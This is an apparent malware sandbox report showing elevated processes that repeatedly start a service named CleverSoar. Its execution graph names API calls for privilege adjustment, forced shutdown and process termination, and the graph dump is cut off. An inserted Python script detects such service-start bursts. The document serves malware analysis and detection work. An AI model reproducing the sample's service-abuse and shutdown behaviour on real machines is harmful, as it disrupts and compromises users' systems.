                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:81
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:82
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:83
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:84
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:85
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:86
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:87
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:88
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:89
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:90
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:91
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:92
                                            Start time:01:52:36
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:93
                                            Start time:01:52:37
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:94
                                            Start time:01:52:37
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:95
                                            Start time:01:52:37
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:96
                                            Start time:01:52:37
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:97
                                            Start time:01:52:37
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:98
                                            Start time:01:52:37
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:99
                                            Start time:01:52:37
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:100
                                            Start time:01:52:37
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:101
                                            Start time:01:52:37
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:102
                                            Start time:01:52:37
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:103
                                            Start time:01:52:38
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:104
                                            Start time:01:52:38
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:105
                                            Start time:01:52:38
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:106
                                            Start time:01:52:38
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:sc start CleverSoar
                                            Imagebase:0x7ff66c860000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:107
                                            Start time:01:52:38
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff72bec0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:108
                                            Start time:01:52:38
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd /c start sc start CleverSoar
                                            Imagebase:0x7ff6e01a0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:267
                                            Start time:01:52:45
                                            Start date:25/12/2024
                                            Path:C:\Windows\System32\Conhost.exe
                                            Wow64 process (32bit):
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:
                                            Has administrator privileges:
                                            Programmed in:C, C++ or other language
                                            Has exited:false
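
The process list above records the same cmd.exe -> sc.exe -> conhost.exe triplet, `cmd /c start sc start CleverSoar`, launched repeatedly within a three-second span, every instance elevated. The following detector is an added example and is not part of the Joe Sandbox report or of the sample's code: it runs a sliding-window count of `sc start <service>` launches over process-creation events and flags a service that is started more than a threshold number of times inside a short window. The event dicts, their field names (time, path, cmdline, elevated), the 10-second window and the threshold of 5 are assumptions chosen for this example; the sample events are constructed to mirror Target IDs 81-108 and are not real telemetry. Real input would come from Sysmon Event ID 1 or Security Event ID 4688 mapped onto the same fields.

```python
"""Added example, not part of the Joe Sandbox report: flag a burst of
"sc start <service>" launches like the one in the process list above.

Assumptions: events are dicts with the fields time/path/cmdline/elevated
(mirroring the report's Start time, Path, Commandline and
"Has elevated privileges" rows); the 10-second window and the threshold
of 5 launches are illustrative tuning values, not values from the report.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# "sc start X" or "<path>\sc.exe start X", optionally quoted. The
# "cmd /c start sc start X" wrapper does not match, so each launch is
# counted once, at the sc.exe process itself.
SC_START_RE = re.compile(
    r'^"?(?:[^"\s\\]*\\)*sc(?:\.exe)?"?\s+start\s+(\S+)\s*$', re.IGNORECASE)


def sc_start_service(cmdline):
    """Return the service name if cmdline is an sc.exe 'start' invocation, else None."""
    m = SC_START_RE.match(cmdline.strip())
    return m.group(1) if m else None


def find_sc_start_bursts(events, window=timedelta(seconds=10), threshold=5):
    """Sliding-window count of sc.exe 'start' launches per service.

    Returns one record per service whose densest window holds at least
    `threshold` launches: service (lower-cased), count, first/last time and
    whether every launch in that window ran with elevated privileges.
    """
    by_service = defaultdict(list)
    for ev in events:
        if not ev["path"].lower().endswith("\\sc.exe"):
            continue  # only the sc.exe process, not cmd.exe or conhost.exe
        service = sc_start_service(ev["cmdline"])
        if service:
            by_service[service.lower()].append(ev)

    bursts = []
    for service, evs in by_service.items():
        evs.sort(key=lambda e: e["time"])
        best, j = None, 0
        for i in range(len(evs)):
            while j < len(evs) and evs[j]["time"] - evs[i]["time"] <= window:
                j += 1
            count = j - i
            if count >= threshold and (best is None or count > best["count"]):
                best = {
                    "service": service,
                    "count": count,
                    "first": evs[i]["time"],
                    "last": evs[j - 1]["time"],
                    "elevated": all(e["elevated"] for e in evs[i:j]),
                }
        if best:
            bursts.append(best)
    return bursts


# --- Constructed sample telemetry (not real log data) -----------------------
# Mirrors the cmd.exe -> sc.exe -> conhost.exe triplets of Target IDs 81-108:
# ten "sc start CleverSoar" launches inside three seconds, all elevated,
# plus two unrelated, non-elevated sc.exe events as benign noise.
def _ev(hms, path, cmdline, elevated=True):
    return {"time": datetime.strptime("25/12/2024 " + hms, "%d/%m/%Y %H:%M:%S"),
            "path": path, "cmdline": cmdline, "elevated": elevated}


SC, CMD, CONHOST = (r"C:\Windows\System32\sc.exe", r"C:\Windows\System32\cmd.exe",
                    r"C:\Windows\System32\conhost.exe")
SAMPLE_EVENTS = []
for _hms in ["01:52:36"] * 4 + ["01:52:37"] * 4 + ["01:52:38"] * 2:
    SAMPLE_EVENTS += [
        _ev(_hms, CMD, "cmd /c start sc start CleverSoar"),
        _ev(_hms, SC, "sc start CleverSoar"),
        _ev(_hms, CONHOST, r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ]
SAMPLE_EVENTS.append(_ev("02:02:10", SC, "sc query wuauserv", elevated=False))
SAMPLE_EVENTS.append(_ev("02:02:11", SC, "sc start wuauserv", elevated=False))


if __name__ == "__main__":
    for b in find_sc_start_bursts(SAMPLE_EVENTS):
        print(f"{b['service']}: {b['count']} sc.exe starts between "
              f"{b['first']:%H:%M:%S} and {b['last']:%H:%M:%S}, "
              f"all elevated={b['elevated']}")
```

Counting only the sc.exe process, rather than the cmd.exe wrapper that launches it via `start`, keeps one event per actual service-start attempt; a single legitimate `sc start` from an administrator stays below the threshold, while the loop in this report produces ten attempts against one service name in three seconds.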


                                              Execution Graph

                                              Execution Coverage:1.9%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:5.2%
                                              Total number of Nodes:727
                                              Total number of Limit Nodes:8
                                              execution_graph: interactive node/edge rendering not reproduced in this text export (727 nodes, 8 limit nodes; the node list is cut off at the end of the export). Windows API calls named at graph nodes, with the node address the report gives for each:
                                              6c1f8810 OpenSCManagerA
                                              6c1f8930 CreateToolhelp32Snapshot
                                              6c1f86e0 CreateProcessA
                                              6c1f9450 GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, NtInitiatePowerAction
                                              6c07fbe8 ExitWindowsEx, Sleep
                                              6c07e8dd GetCurrentProcess, TerminateProcess
                                              6c075164 CreateFileA, CloseHandle
                                              6c1ee0a6 FindFirstFileA
                                              6c210447 GetConsoleMode; 6c2104a8 ReadFile; 6c21045e ReadConsoleW
                                              6c207eab HeapFree, GetLastError
                                              6c1fa133 IsProcessorFeaturePresent, RaiseException, EnterCriticalSection, LeaveCriticalSection
                                              6c0837d0, 6c082452, 6c07ed02 Sleep
6c1ee13c 63735->63736 63737 6c1ee0e2 FindClose 63735->63737 63736->63568 63737->63735 63740 6c1f8846 63738->63740 63739 6c1f88be OpenServiceA 63739->63740 63740->63739 63741 6c1f8922 63740->63741 63741->63613 63747 6c1e0893 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 63742->63747 63743 6c1e4e71 CloseHandle 63743->63747 63744 6c0837cb 63749 6c1f9450 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63744->63749 63745 6c1e3bd1 CloseHandle 63745->63747 63746 6c1ccea0 WriteFile ReadFile WriteFile WriteFile 63746->63747 63747->63743 63747->63744 63747->63745 63747->63746 63832 6c1cc390 63747->63832 63749->63579 63751 6c096bd5 63750->63751 63843 6c0c2020 63751->63843 63753 6c096c68 63754 6c1fa133 std::_Facet_Register 4 API calls 63753->63754 63755 6c096ca0 63754->63755 63860 6c1faa17 63755->63860 63757 6c096cb4 63872 6c0c1d90 63757->63872 63760 6c096d8e 63760->63624 63762 6c096dc8 63880 6c0c26e0 24 API calls 4 library calls 63762->63880 63764 6c096dda 63881 6c1fca69 RaiseException 63764->63881 63766 6c096def 63882 6c0be010 67 API calls 63766->63882 63768 6c096e0f 63768->63624 63771 6c096e9f 63769->63771 63770 6c096eb3 63774 6c096f5b 63770->63774 64274 6c0c2250 30 API calls 63770->64274 64275 6c0c26e0 24 API calls 4 library calls 63770->64275 64276 6c1fca69 RaiseException 63770->64276 63771->63770 64272 6c0c3560 32 API calls std::_Xinvalid_argument 63771->64272 63775 6c096f6e 63774->63775 64273 6c0c37e0 32 API calls std::_Xinvalid_argument 63774->64273 63775->63624 63780 6c09709e 63779->63780 63784 6c0970d1 63779->63784 64277 6c0c01f0 63780->64277 63782 6c097183 63782->63613 63784->63782 64281 6c0c2250 30 API calls 63784->64281 63785 6c204208 67 API calls 63785->63784 63787 6c0971ae 64282 6c0c2340 24 API calls 63787->64282 63789 6c0971be 64283 6c1fca69 RaiseException 63789->64283 63791 6c0971c9 63792->63613 63793->63608 63795 6c1f8770 63794->63795 63796 6c1f87b0 WaitForSingleObject CloseHandle CloseHandle 
63795->63796 63797 6c1f87a4 63795->63797 63796->63795 63797->63617 63798->63628 63800 6c1f90a7 63799->63800 64329 6c1f96e0 63800->64329 63802 6c1f90b8 63803 6c096ba0 104 API calls 63802->63803 63809 6c1f90dc 63803->63809 63804 6c1f9157 64381 6c0be010 67 API calls 63804->64381 63806 6c1f918f std::ios_base::_Ios_base_dtor 64382 6c0be010 67 API calls 63806->64382 63809->63804 63810 6c1f9144 63809->63810 64348 6c1f9a30 63809->64348 64356 6c0d3010 63809->64356 64366 6c1f9280 63810->64366 63811 6c1f91d2 std::ios_base::_Ios_base_dtor 63811->63667 63814 6c1f914c 63815 6c097090 77 API calls 63814->63815 63815->63804 63816->63657 63820 6c1f8966 std::locale::_Setgloballocale 63817->63820 63818 6c1f8a64 Process32NextW 63818->63820 63819 6c1f8a14 CloseHandle 63819->63820 63820->63818 63820->63819 63821 6c1f8a45 Process32FirstW 63820->63821 63822 6c1f8a96 63820->63822 63821->63820 63822->63587 63823->63604 63824->63624 63826->63585 63827->63719 63828->63727 63829->63729 63830->63722 63831->63725 63833 6c1cc3a3 _Yarn __wsopen_s std::locale::_Setgloballocale 63832->63833 63834 6c1cce3c 63833->63834 63835 6c1ccab9 CreateFileA 63833->63835 63837 6c1cb4d0 63833->63837 63834->63747 63835->63833 63838 6c1cb4e3 __wsopen_s std::locale::_Setgloballocale 63837->63838 63839 6c1cc206 WriteFile 63838->63839 63840 6c1cc377 63838->63840 63841 6c1cb619 WriteFile 63838->63841 63842 6c1cbc23 ReadFile 63838->63842 63839->63838 63840->63833 63841->63838 63842->63838 63844 6c1fa133 std::_Facet_Register 4 API calls 63843->63844 63845 6c0c207e 63844->63845 63846 6c1faa17 43 API calls 63845->63846 63847 6c0c2092 63846->63847 63883 6c0c2f60 42 API calls 4 library calls 63847->63883 63849 6c0c20c8 63850 6c0c210d 63849->63850 63851 6c0c2136 63849->63851 63854 6c0c2120 63850->63854 63884 6c1fa67e 9 API calls 2 library calls 63850->63884 63885 6c0c2250 30 API calls 63851->63885 63854->63753 63855 6c0c215b 63886 6c0c2340 24 API calls 63855->63886 63857 6c0c2171 63887 6c1fca69 RaiseException 63857->63887 63859 
6c0c217c 63859->63753 63861 6c1faa23 __EH_prolog3 63860->63861 63888 6c1fa5a5 63861->63888 63864 6c1faa5f 63894 6c1fa5d6 63864->63894 63867 6c1faa41 63902 6c1faaaa 39 API calls std::locale::_Setgloballocale 63867->63902 63869 6c1faa9c 63869->63757 63870 6c1faa49 63903 6c1fa8a1 HeapFree GetLastError _Yarn 63870->63903 63873 6c0c1ddc 63872->63873 63874 6c096d5d 63872->63874 63908 6c1fab37 63873->63908 63874->63760 63879 6c0c2250 30 API calls 63874->63879 63878 6c0c1e82 63879->63762 63880->63764 63881->63766 63882->63768 63883->63849 63884->63854 63885->63855 63886->63857 63887->63859 63889 6c1fa5bb 63888->63889 63890 6c1fa5b4 63888->63890 63892 6c1fa5b9 63889->63892 63905 6c1fbc7b EnterCriticalSection 63889->63905 63904 6c203abd 6 API calls std::_Lockit::_Lockit 63890->63904 63892->63864 63901 6c1fa920 6 API calls 2 library calls 63892->63901 63895 6c203acb 63894->63895 63896 6c1fa5e0 63894->63896 63907 6c203aa6 LeaveCriticalSection 63895->63907 63900 6c1fa5f3 63896->63900 63906 6c1fbc89 LeaveCriticalSection 63896->63906 63899 6c203ad2 63899->63869 63900->63869 63901->63867 63902->63870 63903->63864 63904->63892 63905->63892 63906->63900 63907->63899 63909 6c1fab40 63908->63909 63910 6c0c1dea 63909->63910 63917 6c20343a 63909->63917 63910->63874 63916 6c1ffc53 18 API calls __Getctype 63910->63916 63912 6c1fab8c 63912->63910 63928 6c203148 65 API calls 63912->63928 63914 6c1faba7 63914->63910 63929 6c204208 63914->63929 63916->63878 63918 6c203445 __wsopen_s 63917->63918 63919 6c203478 63918->63919 63920 6c203458 63918->63920 63924 6c203468 63919->63924 63940 6c20e4fc 63919->63940 63954 6c203810 18 API calls __Getctype 63920->63954 63924->63912 63928->63914 63930 6c204214 __wsopen_s 63929->63930 63931 6c204233 63930->63931 63932 6c20421e 63930->63932 63936 6c20422e 63931->63936 64135 6c1ffc99 EnterCriticalSection 63931->64135 64150 6c203810 18 API calls __Getctype 63932->64150 63935 6c204250 64136 6c20428c 63935->64136 63936->63910 63938 6c20425b 64151 6c204282 
LeaveCriticalSection 63938->64151 63941 6c20e508 __wsopen_s 63940->63941 63956 6c203a8f EnterCriticalSection 63941->63956 63943 6c20e516 63957 6c20e5a0 63943->63957 63948 6c20e662 63949 6c20e781 63948->63949 63981 6c20e804 63949->63981 63952 6c2034bc 63955 6c2034e5 LeaveCriticalSection 63952->63955 63954->63924 63955->63924 63956->63943 63964 6c20e5c3 63957->63964 63958 6c20e523 63971 6c20e55c 63958->63971 63959 6c20e61b 63976 6c20a8d5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 63959->63976 63961 6c20e624 63977 6c207eab HeapFree GetLastError __dosmaperr 63961->63977 63964->63958 63964->63959 63974 6c1ffc99 EnterCriticalSection 63964->63974 63975 6c1ffcad LeaveCriticalSection 63964->63975 63965 6c20e62d 63965->63958 63978 6c20a30f 6 API calls std::_Lockit::_Lockit 63965->63978 63967 6c20e64c 63979 6c1ffc99 EnterCriticalSection 63967->63979 63970 6c20e65f 63970->63958 63980 6c203aa6 LeaveCriticalSection 63971->63980 63973 6c203493 63973->63924 63973->63948 63974->63964 63975->63964 63976->63961 63977->63965 63978->63967 63979->63970 63980->63973 63982 6c20e823 63981->63982 63983 6c20e836 63982->63983 63987 6c20e84b 63982->63987 63997 6c203810 18 API calls __Getctype 63983->63997 63985 6c20e797 63985->63952 63994 6c2176ce 63985->63994 63987->63987 63990 6c20e96b 63987->63990 63998 6c217598 37 API calls __Getctype 63987->63998 63989 6c20e9bb 63989->63990 63999 6c217598 37 API calls __Getctype 63989->63999 63990->63985 64001 6c203810 18 API calls __Getctype 63990->64001 63992 6c20e9d9 63992->63990 64000 6c217598 37 API calls __Getctype 63992->64000 64002 6c217a86 63994->64002 63997->63985 63998->63989 63999->63992 64000->63990 64001->63985 64004 6c217a92 __wsopen_s 64002->64004 64003 6c217a99 64020 6c203810 18 API calls __Getctype 64003->64020 64004->64003 64005 6c217ac4 64004->64005 64011 6c2176ee 64005->64011 64010 6c2176e9 64010->63952 64022 6c203dbb 64011->64022 64017 6c217724 64018 6c217756 64017->64018 64062 6c207eab 
HeapFree GetLastError __dosmaperr 64017->64062 64021 6c217b1b LeaveCriticalSection __wsopen_s 64018->64021 64020->64010 64021->64010 64063 6c1ff3db 64022->64063 64025 6c203ddf 64027 6c1ff4e6 64025->64027 64072 6c1ff53e 64027->64072 64029 6c1ff4fe 64029->64017 64030 6c21775c 64029->64030 64087 6c217bdc 64030->64087 64036 6c217882 GetFileType 64039 6c2178d4 64036->64039 64040 6c21788d GetLastError 64036->64040 64037 6c217805 64037->64036 64038 6c217857 GetLastError 64037->64038 64115 6c217b47 CreateFileW 64037->64115 64053 6c21778e __dosmaperr 64038->64053 64117 6c214ea0 SetStdHandle __dosmaperr __wsopen_s 64039->64117 64116 6c2030e2 __dosmaperr 64040->64116 64043 6c21789b CloseHandle 64043->64053 64059 6c2178c4 64043->64059 64045 6c21784a 64045->64036 64045->64038 64046 6c2178f5 64047 6c217941 64046->64047 64118 6c217d56 70 API calls 2 library calls 64046->64118 64051 6c217948 64047->64051 64132 6c217e00 70 API calls 2 library calls 64047->64132 64050 6c217976 64050->64051 64052 6c217984 64050->64052 64119 6c20f015 64051->64119 64052->64053 64055 6c217a00 CloseHandle 64052->64055 64053->64017 64133 6c217b47 CreateFileW 64055->64133 64057 6c217a2b 64058 6c217a35 GetLastError 64057->64058 64057->64059 64060 6c217a41 __dosmaperr 64058->64060 64059->64053 64134 6c214e0f SetStdHandle __dosmaperr __wsopen_s 64060->64134 64062->64018 64064 6c1ff3fb 64063->64064 64070 6c1ff3f2 64063->64070 64065 6c2080a2 __Getctype 37 API calls 64064->64065 64064->64070 64066 6c1ff41b 64065->64066 64067 6c208618 __Getctype 37 API calls 64066->64067 64068 6c1ff431 64067->64068 64069 6c208645 __fassign 37 API calls 64068->64069 64069->64070 64070->64025 64071 6c20a0c5 5 API calls std::_Lockit::_Lockit 64070->64071 64071->64025 64073 6c1ff54c 64072->64073 64074 6c1ff566 64072->64074 64077 6c1ff4cc __wsopen_s HeapFree GetLastError 64073->64077 64075 6c1ff56d 64074->64075 64076 6c1ff58c 64074->64076 64079 6c1ff48d __wsopen_s HeapFree GetLastError 64075->64079 64083 6c1ff556 __dosmaperr 
